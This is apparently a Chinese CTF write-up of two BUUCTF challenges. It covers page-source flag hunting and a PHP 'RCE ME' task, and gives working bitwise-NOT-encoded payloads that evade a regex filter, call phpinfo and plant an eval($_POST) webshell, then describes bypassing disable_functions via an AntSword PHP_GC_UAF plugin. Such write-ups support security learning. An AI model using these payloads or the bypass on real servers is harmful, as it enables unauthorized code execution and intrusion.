BUUCTF 36
作者:互联网
知识点
-
preg_match() 函数
-
语法:int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] )
-
参数:
-
作用:在 subject 字符串中搜索与 pattern给出的正则表达式相匹配的内容。
36-1 [BSidesCF 2019]Futurella
做题思路
题目要我们阻止外星人,需要我们尝试读懂这个
查看了下源代码,成功找到flag
不太相信,尝试输入,卧槽,真的是这个
36-2 [极客大挑战 2019]RCE ME
做题思路
分析代码
查找php的信息
?code=(~%8F%97%8F%96%91%99%90)();
构造一个shell连上蚁剑
使用一句话木马<?php error_reporting(0); $a='assert'; $b=urlencode(~$a); echo $b; echo "<br>"; $c='(eval($_POST["test"]))'; $d=urlencode(~$c); echo $d; ?>
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);
进入之后直接找根目录下的flag
下面有两个文件,但是我们的shell不能执行命令
原因是我们之前查找phpinfo的时候,disable_functions 禁用了太多函数,我们需要绕开disable_functions
然后蚁剑有一个插件有这样的功能
选择PHP_GC_UAF模式
运行得到终端,运行/readflag获得Flag:
标签:code,8C%,int,36,BUUCTF,2019,9A% 来源: https://blog.csdn.net/qq_52431855/article/details/114310851